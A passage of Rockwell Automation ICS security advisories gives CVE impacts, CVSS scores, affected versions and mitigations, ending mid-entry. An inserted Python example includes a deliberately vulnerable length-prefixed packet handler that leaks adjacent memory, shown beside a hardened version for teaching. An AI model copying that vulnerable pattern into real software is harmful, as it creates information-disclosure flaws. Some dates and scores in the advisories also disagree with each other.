Rockwell Automation used version 3.1 of the CVSS scoring system to assess the following vulnerabilities.

CVE-2015-9268 IMPACT

Due to the third-party vulnerabilities in Nullsoft Scriptable Install System (NSIS), the SIS Workstation and ISaGRAF® Workbench installer and uninstaller have unsafe implicit linking against Version.dll. Therefore, there is no protection mechanism in the wrapper function that resolves the dependency at an appropriate time during runtime. Also, the SIS workstation and ISaGRAF® Workbench uninstaller uses temporary folder locations that allow unprivileged local users to overwrite files. This allows a local attack in which the uninstaller can be replaced by a malicious program.

CVSS Base Score: 7.8/10

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CWE: Improper Input Validation

Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Mitigations and Workarounds

Customers using the affected software are encouraged to apply the risk mitigations, if possible. Additionally, we encourage customers to implement our suggested security best practices to minimize the risk of vulnerability.

  • Security Best Practices

ADDITIONAL RESOURCES

  • CVE-2015-9268 JSON
Critical
SD1657 | FactoryTalk® Activation Contains Wibu CodeMeter Vulnerabilities
Published Date:
November 15, 2023
Last Updated:
November 19, 2024
CVE IDs:
CVE-2023-38545, CVE-2023-3935
Products:
FactoryTalk Activation Manager
CVSS Scores (v3.1):
7.9, 9.8
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Published Date: November 14, 2023

Last updated: November 14, 2023

Revision Number: 1.0

CVSS Score: 7.8

AFFECTED PRODUCTS AND SOLUTION

Affected Product | First Known in Software Version | Corrected in Software Version
FactoryTalk Activation Manager | V4.00 (Utilizes Wibu-Systems CodeMeter <7.60c) | 5.01

VULNERABILITY DETAILS

Rockwell Automation used version 3.1 of the CVSS scoring system to assess the following vulnerabilities.

CVE-2023-38545 IMPACT

Rockwell Automation FactoryTalk Activation Manager and Studio 5000 Logix Designer use the affected Wibu-Systems products, which internally use libcurl in a version that is vulnerable to a buffer overflow if curl is configured to redirect traffic through a SOCKS5 proxy. A malicious proxy can exploit a bug in the implemented handshake to cause a buffer overflow. If no SOCKS5 proxy has been configured, there is no attack surface.

CVSS Base Score: 7.9

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE-787: Out-of-bounds Write

Known Exploited Vulnerability (KEV) database: No

CVE-2023-3935 IMPACT

Rockwell Automation FactoryTalk Activation Manager and Studio 5000 Logix Designer use the affected Wibu-Systems products, which contain a heap buffer overflow vulnerability in the Wibu CodeMeter Runtime network service up to version 7.60b that allows an unauthenticated, remote attacker to achieve RCE and gain full access to the host system.

CVSS Base Score: 9.8

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE-787: Out-of-bounds Write

Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Mitigations and Workarounds

Customers using the affected software are encouraged to apply the risk mitigations, if possible.

  • Upgrade to FactoryTalk Activation Manager 5.01, which has been patched to mitigate these issues (available versions here; search "activation").
  • Additionally, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

ADDITIONAL RESOURCES

  • CVE-2023-38545 JSON
  • CVE-2023-3935 JSON
  • Wibu Systems Product Security Advisory WIBU-230704-01 (CVE-2023-3935)
  • Wibu Systems Product Security Advisory WIBU-231017-01 (CVE-2023-38545)
High
PN1656 | FactoryTalk® View Site Edition Vulnerable to Improper Input Validation
Published Date:
October 31, 2023
Last Updated:
December 10, 2024
CVE IDs:
CVE-2023-46289
Products:
FactoryTalk® View Site Edition
CVSS Scores (v3.1):
7.5
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No

Revision Number: 1.0

Revision History: Version 1.0 – October 26, 2023

Executive Summary

The security of our products is important to us as your chosen industrial automation supplier. This vulnerability was found internally during routine testing and is being reported based on our commitment to customer transparency and to improving their business or production environments.

Affected Products

Affected Product | First Known in Software Version | Corrected in Software Version
FactoryTalk® View Site Edition | V11.0 | v11.0 & v12.0 & v13.0 patch

Vulnerability Details

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2023-46289 IMPACT
The affected product insufficiently validates user input, which could potentially allow threat actors to send malicious data bringing the product offline. If exploited, the product would become unavailable and require a restart to recover resulting in a denial-of-service condition.

CVSS Base Score: 7.5/10 (High)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
CWE: CWE-20: Improper Input Validation

Known Exploited Vulnerability (KEV) database:  No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Risk Mitigation & User Action

Customers using the affected software are encouraged to apply the risk mitigations, if possible. Additionally, we encourage customers to implement our suggested security best practices to minimize the risk of vulnerability.

  • Install the patch that remediates the issue: BF29581 - Patch: External Service Interaction (HTTP), FactoryTalk View SE 11.0, 12.0, 13.0.
  • QA43240 - Recommended Security Guidelines from Rockwell Automation

Additional Resources

  • CVE-2023-46289  JSON
High
PN1655 | FactoryTalk® Services Platform Elevated Privileges Vulnerability
Published Date:
October 31, 2023
Last Updated:
December 10, 2024
CVE IDs:
CVE-2023-46290
Products:
FactoryTalk® Services Platform
CVSS Scores (v3.1):
8.1
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No

Revision Number: 1.0

Revision History: Version 1.0 – October 26, 2023

Executive Summary

The security of our products is important to us as your chosen industrial automation supplier. This vulnerability was found internally during routine testing and is being reported based on our commitment to customer transparency and to improving their business or production environments.

Affected Products

Affected Product | First Known in Software Version | Corrected in Software Version
FactoryTalk® Services Platform | v2.74 | V2.80 and later

Vulnerability Details

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2023-46290 IMPACT
Due to inadequate code logic, a previously unauthenticated threat actor could potentially obtain a local Windows OS user token through the FactoryTalk® Services Platform web service and then use the token to log in to FactoryTalk® Services Platform. This vulnerability can only be exploited if the authorized user did not previously log in to the FactoryTalk® Services Platform web service.

CVSS Base Score: 8.1/10 (High)
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE: CWE-287: Improper Authentication

Known Exploited Vulnerability (KEV) database:  No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Risk Mitigation & User Action

Customers using the affected software are encouraged to apply the risk mitigations, if possible. Additionally, we encourage customers to implement our suggested security best practices to minimize the risk of vulnerability.

  • Install the respective FactoryTalk Services Version that remediates the issue.
  • QA43240 - Recommended Security Guidelines from Rockwell Automation

Additional Resources

  • CVE-2023-46290 JSON
High
PN1654 | Arena® Simulation Buffer Overflow Vulnerabilities
Published Date:
October 31, 2023
Last Updated:
December 10, 2024
CVE IDs:
CVE-2023-27854, CVE-2023-27858
Products:
Arena® Simulation Software
CVSS Scores (v3.1):
7.8
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No

Revision Number: 1.0

Revision History: Version 1.0 – October 27, 2023

Affected Products

Affected Product | First Known in Software Version | Corrected in Software Version
Arena® Simulation Software | V16.00 | 16.20.02

Vulnerability Details

These vulnerabilities were reported to Rockwell Automation by Michael Heinzl. Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2023-27854 IMPACT
An arbitrary code execution vulnerability was reported to Rockwell Automation that could potentially allow a malicious user to commit unauthorized arbitrary code to the software by using a memory buffer overflow. The threat actor could then execute malicious code on the system, affecting the confidentiality, integrity, and availability of the product. The user would need to open a malicious file provided to them by the attacker for the code to execute.

CVSS Base Score: 7.8
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE-125: Out-of-bounds Read

Known Exploited Vulnerability (KEV) database: No

CVE-2023-27858 IMPACT
An arbitrary code execution vulnerability could potentially allow a malicious user to commit unauthorized code to the software by using an uninitialized pointer in the application. The threat actor could then execute malicious code on the system, affecting the confidentiality, integrity, and availability of the product. The user would need to open a malicious file provided to them by the attacker for the code to execute.

CVSS Base Score: 7.8
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE-824: Access of Uninitialized Pointer

Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Risk Mitigation & User Action

Customers using the affected software are encouraged to apply the risk mitigations, if possible.

  • Upgrade to 16.20.02, which has been patched to mitigate these issues, by referencing BF29820 - Patch: ZDI Security Patch & Windows 11 updates, Arena 16.2.
  • Implement our QA43240 - Recommended Security Guidelines from Rockwell Automation to minimize risk of the vulnerability.

Additional Resources

  • CVE-2023-27854 JSON
  • CVE-2023-27858 JSON
Critical
PN1653 | Stratix® 5800 and 5200 vulnerable to Cisco IOS XE Web UI Privilege Escalation (Active Exploit)
Published Date:
October 18, 2023
Last Updated:
December 10, 2024
CVE IDs:
CVE-2023-20198
Products:
Stratix® 5200, Stratix® 5800
CVSS Scores (v3.1):
7.2, 10
Known Exploited Vulnerability (KEV):
Yes
Corrected:
Yes
Workaround:
No

Published Date: 10/17/2023
Last updated:  02/14/2024
Revision Number: 2.0
Revision History: Updated Corrected in firmware revision
CVSS Score: 10/10

Rockwell Automation is aware of an actively exploited zero-day vulnerability affecting the Stratix® 5800 and the newly released Stratix® 5200 product. This vulnerability was reported by Cisco on October 16, 2023 and additional information can be found in their original disclosure. As of the time of publication, no patch is available for this vulnerability and multiple cases of active exploitation have been observed. While Rockwell Automation has no evidence of active exploitation against the Stratix® product line, this vulnerability was discovered by Cisco Talos during an incident response for a Cisco customer. This advisory will be updated, as remediation steps become available.

REVISION 1.1 UPDATE

Since publication of the original disclosure, the exploit code has become publicly available. Availability of exploit code reduces the technical barriers for threat actors to target the affected devices. Rockwell Automation has no evidence of active exploitation against the Stratix® product line currently. This advisory has been updated to include specific steps to take to create access control measures utilizing the Web UI. Rockwell Automation strongly encourages customers to follow the mitigation guidelines.

REVISION 2.0 UPDATE

Rockwell Automation has released a software update that remediates the vulnerabilities in the affected products. We strongly recommend customers update to the corrected firmware revision as soon as possible.

AFFECTED PRODUCTS AND SOLUTION

Affected Product | First known in firmware revision | Corrected in Firmware Revision
Stratix® 5200, 5800 | All versions running Cisco IOS XE Software with the Web UI feature enabled | 17.12.02

VULNERABILITY DETAILS

CVE-2023-20198 IMPACT

Rockwell Automation is aware of active exploitation of a previously unknown vulnerability in the Web UI feature of Cisco IOS XE Software when exposed to the internet or to untrusted networks. This vulnerability allows a remote, unauthenticated threat actor to create an account on a vulnerable system with privilege level 15 access. The threat actor could then potentially use that account to gain control of the affected system.

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVSS Base Score: 10/10 (High)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Known Exploited Vulnerability (KEV) database: Yes

CVE-2023-20273 IMPACT

Rockwell Automation is aware of active exploitation of a previously unknown vulnerability in the Web UI feature of Cisco IOS XE Software when exposed to the internet or to untrusted networks. This vulnerability could allow an authenticated, remote threat actor to inject commands with the privileges of root. This vulnerability is due to insufficient input validation. A threat actor could exploit this vulnerability by sending crafted input to the web UI. A successful exploit could allow the threat actor to inject commands to the underlying operating system with root privileges.  

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVSS Base Score: 7.2/10 (high)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Known Exploited Vulnerability (KEV) database: Yes

Mitigations and Workarounds

Rockwell Automation strongly encourages customers to follow the guidance below and disable the Stratix® HTTP server feature on all internet-facing systems.

  • To disable the HTTP Server feature, use the no ip http server or no ip http secure-server command in global configuration mode. If both the HTTP server and HTTPS server are in use, both commands are required to disable the HTTP Server feature.
  • Cisco Talos has provided Indicators of Compromise and Snort rules that can be found here.

REVISION 1.1 UPDATE

  • Access Control Lists should be enabled so that only specific IP addresses can reach the Web UI of the device. Detailed instructions on how to create the Access Control List are in QA67053.
  • When implementing access controls for these services, be sure to review the controls because there is the potential for an interruption in production services.
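The two mitigation paths above (disabling the HTTP/HTTPS servers, or restricting the Web UI with an access list) can be checked and generated from a saved running-config. The following Python is an added example written for this page, not Rockwell Automation or Cisco code; the sample configuration is constructed, and the `ip http access-class ipv4 <name>` binding syntax is an assumption based on IOS XE 17.x that should be confirmed against QA67053 before use.

```python
"""Audit a Stratix / IOS XE running-config for Web UI exposure and print the fix.

Added example, not Rockwell Automation or Cisco code. It checks the two conditions
the advisory names (HTTP or HTTPS server enabled, and whether an access-class
restricts the Web UI) and emits the global-configuration commands to remediate.
The ACL binding syntax `ip http access-class ipv4 <name>` is an assumption taken
from IOS XE 17.x; confirm it against QA67053 and your platform's documentation.
"""
import re

# Constructed sample of `show running-config` output; not from a real device.
SAMPLE_CONFIG = """\
hostname STRATIX-5800-CELL1
!
ip http server
ip http secure-server
ip http authentication local
!
interface GigabitEthernet1/0/1
 description uplink
!
end
"""

_ACCESS_CLASS = re.compile(r"^ip http access-class (?:ipv4 )?(\S+)$")


def audit_webui(running_config: str) -> dict:
    """Report which Web UI servers are on and whether an ACL limits who can reach them."""
    lines = [line.strip() for line in running_config.splitlines()]
    http_on = "ip http server" in lines
    https_on = "ip http secure-server" in lines
    acl = None
    for line in lines:
        m = _ACCESS_CLASS.match(line)
        if m:
            acl = m.group(1)
    return {
        "http": http_on,
        "https": https_on,
        "access_class": acl,
        # "exposed" is the advisory's condition: a Web UI server is enabled and
        # nothing restricts which sources may reach it.
        "exposed": (http_on or https_on) and acl is None,
    }


def remediation(audit: dict, disable: bool = True, mgmt_hosts=(), acl_name="WEBUI-MGMT") -> list:
    """Global-config commands: disable the Web UI (preferred), or restrict it to mgmt_hosts."""
    if disable:
        cmds = []
        if audit["http"]:
            cmds.append("no ip http server")
        if audit["https"]:
            cmds.append("no ip http secure-server")
        return cmds
    if not mgmt_hosts:
        raise ValueError("restricting the Web UI needs at least one management host")
    cmds = [f"ip access-list standard {acl_name}"]
    cmds += [f" permit host {host}" for host in mgmt_hosts]
    cmds.append(" deny any log")
    cmds.append(f"ip http access-class ipv4 {acl_name}")
    return cmds


if __name__ == "__main__":
    result = audit_webui(SAMPLE_CONFIG)
    print(result)
    print("\n".join(remediation(result)))
```

Run it against the output of `show running-config` captured from each Stratix® switch. As the advisory notes, test the resulting access list from a console session before applying it in production, since a mis-scoped ACL also locks out legitimate management hosts.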

ADDITIONAL RESOURCES

  • CVE-2023-20198 JSON
  • CVE-2023-20273 JSON
  • Cisco CSAF File
High
PN1652 | FactoryTalk® Linx Vulnerable to Denial-of-Service and Information Disclosure
Published Date: October 17, 2023
Last Updated: October 17, 2023
CVE IDs: CVE-2023-29464
Products: FactoryTalk® Linx
CVSS Scores: 8.2
Known Exploited Vulnerability (KEV): No
Corrected: No
Workaround: No

Revision History

Revision Number: 1.0
Version 1.0 – October 12, 2023

Affected Products

Affected Product | First Known in Revision | Corrected in Revision
FactoryTalk® Linx | v6.20 | v6.20 & v6.30 patch

Vulnerability Details

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.  Rockwell Automation would like to thank Yuval Gordon, CPS Research, Microsoft Threat Intelligence Community for reporting this vulnerability to us.

CVE-2023-29464 IMPACT

FactoryTalk® Linx, as used in the Rockwell Automation PanelView™ Plus, allows an unauthenticated threat actor to read data from memory via crafted malicious packets. Sending a size larger than the buffer size results in leakage of data from memory, resulting in an information disclosure. If the size is large enough, communications over the Common Industrial Protocol (CIP) become unresponsive to any type of packet, resulting in a denial-of-service to FactoryTalk® Linx over CIP.

CVSS Base Score: 8.2/10 (high)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H
CWE: 20 – Improper Input Validation
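To make the failure mode concrete, here is an added Python model (not Rockwell code and not the FactoryTalk® Linx wire format) of a length-prefixed request handled with and without the check described above; the buffer size and the "adjacent" secret are constructed values.

```python
"""Length-field validation of the kind CVE-2023-29464 describes as missing.

Added example; not Rockwell code and not the FactoryTalk Linx wire format. It models
a generic length-prefixed CIP-style request (2-byte big-endian length, then payload)
and a fixed-size receive buffer with a simulated secret in the memory that follows it.
The vulnerable handler trusts the declared length when copying out of the buffer, so a
length larger than the buffer returns the neighbouring bytes (information disclosure).
The hardened handler rejects any declared length that exceeds the bytes actually
received or the buffer size. BUF_SIZE and the secret are constructed values.
"""
import struct

BUF_SIZE = 64                                   # assumed receive-buffer size for the model
_ADJACENT_SECRET = b"SESSION-TOKEN-0xCAFEBABE"  # constructed data "next to" the buffer


class MalformedPacket(ValueError):
    pass


def build(declared_len: int, payload: bytes) -> bytes:
    """Frame a packet: 2-byte length field followed by the payload bytes."""
    return struct.pack(">H", declared_len) + payload


def _receive_into_buffer(payload: bytes) -> bytearray:
    """Simulated process memory: the receive buffer, then unrelated data."""
    mem = bytearray(BUF_SIZE + len(_ADJACENT_SECRET))
    mem[: min(len(payload), BUF_SIZE)] = payload[:BUF_SIZE]
    mem[BUF_SIZE:] = _ADJACENT_SECRET
    return mem


def vulnerable_handle(packet: bytes) -> bytes:
    """Copies `declared` bytes out of the buffer without checking the length field."""
    (declared,) = struct.unpack(">H", packet[:2])
    mem = _receive_into_buffer(packet[2:])
    return bytes(mem[:declared])        # declared > BUF_SIZE walks into the secret


def hardened_handle(packet: bytes) -> bytes:
    """Validates the length field against both received bytes and buffer capacity."""
    if len(packet) < 2:
        raise MalformedPacket("header truncated")
    (declared,) = struct.unpack(">H", packet[:2])
    payload = packet[2:]
    if declared > len(payload):
        raise MalformedPacket(f"declared {declared} bytes, received {len(payload)}")
    if declared > BUF_SIZE:
        raise MalformedPacket(f"declared {declared} bytes exceeds buffer of {BUF_SIZE}")
    return payload[:declared]
```

The same two comparisons (declared length against bytes received, and against the destination buffer) are what any length-prefixed protocol parser needs before it copies; the order matters only in which error you report first.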

Risk Mitigation & User Action

Customers using the affected versions are encouraged to upgrade to corrected firmware revisions. We also strongly encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

  • Install the security patches for the respective versions, referencing BF29637 - Patch: Hardening of the FactoryTalk Linx communications service for MobileView to authenticate and block improperly sized files, FactoryTalk Linx 6.20, 6.30.
  • QA43240 - Recommended Security Guidelines from Rockwell Automation

Additional Resources

  • JSON CVE-2023-29464
Critical
PN1649 | Select Logix Communication Modules Vulnerable to Email Object Buffer Overflow
Published Date: October 09, 2023
Last Updated: October 09, 2023
CVE IDs: CVE-2023-2262
Products: ControlLogix Communication - Ethernet/IP
CVSS Scores: 9.8
Known Exploited Vulnerability (KEV): No
Corrected: No
Workaround: No

Revision History

Revision Number: 1.0
Version 1.0 – September 19, 2023

Executive Summary

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improving their business or production environments. This vulnerability is not related to PN1633 - Remote Code Execution and Denial-of-Service Vulnerabilities in Select Communication Modules.

Affected Products

Affected Catalog | Series | Affected Firmware Version | Corrected in Firmware Version
1756-EN2T, 1756-EN2TK, 1756-EN2TXT | A, B, C | <=5.008 and 5.028 | Update to 5.009 or 5.029 or later
1756-EN2T, 1756-EN2TK, 1756-EN2TXT | D | <=11.002 | Update to 11.003 or later
1756-EN2TP, 1756-EN2TPK, 1756-EN2TPXT | A | <=11.002 | Update to 11.003 or later
1756-EN2TR, 1756-EN2TRK, 1756-EN2TRXT | A, B | <=5.008 and 5.028 | Update to 5.009 or 5.029 or later
1756-EN2TR, 1756-EN2TRK, 1756-EN2TRXT | C | <=11.002 | Update to 11.003 or later
1756-EN2F, 1756-EN2FK | A, B | <=5.008 and 5.028 | Update to 5.009 or 5.029 or later
1756-EN2F, 1756-EN2FK | C | <=11.002 | Update to 11.003 or later
1756-EN3TR, 1756-EN3TRK | A | <=5.008 and 5.028 | Update to 5.009 or 5.029 or later
1756-EN3TR, 1756-EN3TRK | B | <=11.002 | Update to 11.003 or later

Vulnerability Details

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2023-2262 IMPACT
A buffer overflow vulnerability exists in select communication devices. If exploited, a threat actor could potentially leverage this vulnerability to achieve remote code execution. To exploit this vulnerability, a threat actor would have to send a maliciously crafted CIP request to the device.

CVSS Base Score: 9.8/10
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE: CWE-121: Stack-based Buffer Overflow

Known Exploited Vulnerability (KEV) database:  No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Risk Mitigation & User Action

Customers using the affected software are encouraged to apply the risk mitigations, if possible. Additionally, we encourage customers to implement our suggested security best practices to minimize the risk of vulnerability.

  • Restrict traffic to the SMTP port (25), if not needed.
  • Customers using the EN2/EN3 versions 10.x and higher can disable the email object, if not needed. Instructions can be found in the EtherNet/IP Network Devices User Manual (rockwellautomation.com), publication ENET-UM006.
  • QA43240 - Recommended Security Guidelines from Rockwell Automation

Additional Resources

  • CVE-2023-2262 JSON
  • CISA ICS-SA CSAF
Critical
PN1648 | Connected Components Workbench™ Vulnerable to CefSharp Vulnerabilities
Published Date: October 05, 2023
Last Updated: October 05, 2023
CVE IDs: CVE-2020-16017, CVE-2022-0609, CVE-2020-16009, CVE-2020-16013, CVE-2020-15999
Products: Connected Components Workbench (CCW)
CVSS Scores: 9.6, 8.8, 8.8, 8.8, 6.5
Known Exploited Vulnerability (KEV): Yes
Corrected: No
Workaround: No

Revision History

Revision Number: 1.0
Version 1.0 – September 19, 2023

Executive Summary

The security of our products is important to us as your chosen industrial automation supplier.  This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

Affected Products

Affected Product Affected Versions Corrected in Software Version
Connected Components Workbench™ (CCW) Versions Prior to R21 R21 and later

Vulnerability Details

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2020-16017 IMPACT
Connected Components Workbench utilizes CefSharp version 81.3.100 that contains a use after free vulnerability in Google Chrome versions before 86.0.4240.198. If exploited, a remote threat actor could potentially perform a sandbox escape via a crafted HTML page.

CVSS Base Score: 9.6/10
CVSS Vector:  CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
CWE: 416 – Use After Free

Known Exploited Vulnerability (KEV) database:  Yes

CVE-2022-0609 IMPACT
Connected Components Workbench utilizes CefSharp version 81.3.100 that contains a use after free vulnerability in Animation within Google Chrome before 98.0.4758.102. This vulnerability could potentially allow a remote threat actor to exploit heap corruption via a crafted HTML page.

CVSS Base Score: 8.8/10
CVSS Vector:  CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE: 416 – Use After Free

Known Exploited Vulnerability (KEV) database:  Yes

CVE-2020-16009 IMPACT
Connected Components Workbench utilizes CefSharp version 81.3.100, which contains an inappropriate implementation in V8 of Google Chrome before 86.0.4240.183. This vulnerability allows a remote threat actor to potentially exploit heap corruption via a crafted HTML page.

CVSS Base Score: 8.8/10
CVSS Vector:  CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE: 787 Out-of-bounds Write & 843 Access of Resource Using Incompatible Type ("Type Confusion")
 
Known Exploited Vulnerability (KEV) database:  Yes

CVE-2020-16013 IMPACT
Connected Components Workbench utilizes CefSharp version 81.3.100 that contains an inappropriate implementation in V8 of Google Chrome before 86.0.4240.198. This vulnerability allows a remote threat actor to potentially exploit heap corruption via a crafted HTML page.

CVSS Base Score: 8.8/10
CVSS Vector:  CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE: 787 Out-of-bounds Write

Known Exploited Vulnerability (KEV) database:  Yes

CVE-2020-15999 IMPACT
Connected Components Workbench utilizes CefSharp version 81.3.100, which contains a heap buffer overflow vulnerability in FreeType within Google Chrome before 86.0.4240.111. This vulnerability could allow a remote threat actor to potentially exploit heap corruption via a crafted HTML page.

CVSS Base Score: 6.5/10
CVSS Vector:  CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE: 787 Out-of-bounds Write

Known Exploited Vulnerability (KEV) database:  Yes

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Risk Mitigation & User Action

Customers using the affected software are encouraged to apply the risk mitigations, if possible. Additionally, we encourage customers to implement our suggested security best practices to minimize the risk of vulnerability.

  • Upgrade to version 21 or later.
  • QA43240 - Recommended Security Guidelines from Rockwell Automation

Additional Resources

  • CVE-2020 – 16017 JSON
  • CVE-2022 – 0609 JSON
  • CVE-2020 – 16009 JSON
  • CVE-2020 – 16013 JSON
  • CVE-2020 – 15999 JSON
  • CISA ICS-SA CSAF
Critical
PN1647 | PanelView™ 800 Vulnerable to CVE-2017-12652
Published Date: October 05, 2023
Last Updated: October 05, 2023
CVE IDs: CVE-2017-12652
Products: PanelView 800, PanelView Component Refresh (PanelView 800)
CVSS Scores: 9.8
Known Exploited Vulnerability (KEV): No
Corrected: No
Workaround: No

Revision History

Revision Number: 1.0
Version 1.0 - September 19, 2023

Executive Summary

The security of our products is important to us as your chosen industrial automation supplier.  This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

Affected Products

Affected Product | First Known in Firmware Revision | Corrected in Firmware Revision
2711R-T10T, 2711R-T7T, 2711R-T4T | v3.011 | v6.011

Vulnerability Details

An input/output validation vulnerability exists in a third-party component that the PanelView™ 800 utilizes. libpng, the PNG reference library, in versions prior to 1.6.32 does not properly check the length of chunks against the user limit. When successfully exploited, this could potentially lead to a disclosure of sensitive information, addition or modification of data, or a denial-of-service condition.
Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVSS Base Score: 9.8/10
CVSS Vector:  CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE: 20 – Improper Input Validation

Known Exploited Vulnerability (KEV) database:  No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.
 

Risk Mitigation & User Action

Customers using the affected software are encouraged to apply risk mitigations, if possible. Additionally, we encourage customers to implement our suggested security best practices to minimize the risk of vulnerability.

  • Update to v6.011 or later, which mitigates the issue.
  • Implement QA43240 - Recommended Security Guidelines from Rockwell Automation.

Additional Resources

  • CVE-2017-12652 JSON
Medium
PN1646 | KEPServer Enterprise Vulnerable to Multiple Vulnerabilities
Published Date: October 05, 2023
Last Updated: October 05, 2023
CVE IDs: CVE-2023-29444, CVE-2023-29445, CVE-2023-29446, CVE-2023-29447
Products: KEPServer Enterprise
CVSS Scores: 6.3, 6.3, 4.7, 5.7
Known Exploited Vulnerability (KEV): No
Corrected: No
Workaround: No

Revision History

Version 1.0 – September 12, 2023

Affected Products

Affected Product | First Known in Software Version | Corrected in Software Version
KEPServer Enterprise | v11.00 | Expected November 2023

Vulnerability Details

Rockwell Automation was notified by CISA of vulnerabilities discovered in Kepware® KEPServerEX (also known as PTC ThingWorx Industrial Connectivity), which affects Rockwell Automation’s KEPServer Enterprise product. Successful exploitation of these vulnerabilities could allow a threat actor to gain elevated privileges, execute arbitrary code, and obtain server hashes and credentials.

CVE-2023-29444 KEPServer Enterprise Uncontrolled Search Path Element
The installer application of KEPServerEX is vulnerable to DLL search order hijacking. This could allow an adversary to repackage the installer with a malicious DLL and trick users into installing the trojanized software. Successful exploitation could lead to code execution with administrator privileges.

CVSS Base Score: 6.3 /10 (Medium)
CVSS 3.1 Vector String: AV:L/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H
CWE-427: Uncontrolled Search Path Element

CVE-2023-29445 KEPServer Enterprise Uncontrolled Search Path Element
The KEPServerEX binary is vulnerable to DLL search order hijacking. A locally authenticated adversary could escalate privileges to administrator by planting a malicious DLL in a specific directory.

CVSS Base Score: 6.3 /10 (Medium)
CVSS 3.1 Vector String: AV:L/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H
CWE-427: Uncontrolled Search Path Element

CVE-2023-29446 KEPServer Enterprise Improper Input Validation
KEPServerEX is vulnerable to UNC path injection via a malicious project file. By tricking a user into loading a project file and clicking a specific button in the GUI, an adversary could obtain Windows user NTLMv2 hashes and crack them offline.

CVSS Base Score: 4.7 /10 (Medium)
CVSS 3.1 Vector String: AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N
CWE-20: Improper Input Validation

CVE-2023-29447 KEPServer Enterprise Insufficiently Protected Credentials
The KEPServerEX Configuration web server uses basic authentication to protect user credentials. An adversary could perform a man-in-the-middle (MitM) attack via ARP spoofing to obtain the web server's plaintext credentials.

CVSS Base Score: 5.7 /10 (Medium)
CVSS 3.1 Vector String: AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
CWE-522: Insufficiently Protected Credentials

Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate environment-specific prioritization.

Risk Mitigation & User Action

Customers using the affected versions are encouraged to apply the risk mitigations below and implement our suggested security best practices to minimize risk of this vulnerability in their environments. 

  • Users should follow the directions in PTC’s secure configuration documentation.
  • Implement QA43240 - Recommended Security Guidelines from Rockwell Automation.

Additional Resources

  • ICSA-23-243-03 Advisory
  • PTC Advisory CS399528
Critical
PN1645 | FactoryTalk View Machine Edition Vulnerable to Remote Code Execution
Published Date: October 05, 2023
Last Updated: October 05, 2023
CVE IDs: CVE-2023-2071
Products: FactoryTalk View Machine Edition
CVSS Scores: 9.8
Known Exploited Vulnerability (KEV): No
Corrected: No
Workaround: No

Revision History

Revision Number: 1.0
Version 1.0 – September 12, 2023

Affected Products

Affected Product | First Known in Revision | Corrected in Revision
